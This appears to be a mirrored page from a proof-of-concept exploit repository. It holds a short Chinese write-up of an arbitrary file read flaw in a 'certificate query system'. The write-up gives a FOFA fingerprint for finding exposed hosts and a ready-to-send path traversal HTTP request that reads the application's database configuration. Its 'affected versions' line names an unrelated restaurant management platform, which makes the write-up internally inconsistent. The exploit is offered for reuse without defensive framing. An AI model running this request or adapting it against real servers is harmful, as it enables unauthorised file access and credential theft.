admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 19:35:52 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/证书查询系统/证书查询系统存在任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

27 lines
958 B
Markdown
Raw Blame History

# 证书查询系统存在任意文件读取漏洞
# 一、漏洞简介
证书查询系统存在任意文件读取漏洞
# 二、影响版本
+ 餐厅数字化综合管理平台
# 三、资产测绘
+ fofa`"/index/js/jquery.uls.data.js'"`
![1722352904056-06c70fd3-31e8-4d32-8012-4ad428356e37.png](./img/RJ349Ot7eGo3wrZl/1722352904056-06c70fd3-31e8-4d32-8012-4ad428356e37-929281.png)
# 四、漏洞复现
```java
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
```
![1722352933489-540436b5-cdf7-4ec0-8c66-5b946f3fe4c7.png](./img/RJ349Ot7eGo3wrZl/1722352933489-540436b5-cdf7-4ec0-8c66-5b946f3fe4c7-454699.png)
> 更新: 2024-08-12 17:15:58
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kw3y9u4xck897gu2>
Reference in New Issue View Git Blame Copy Permalink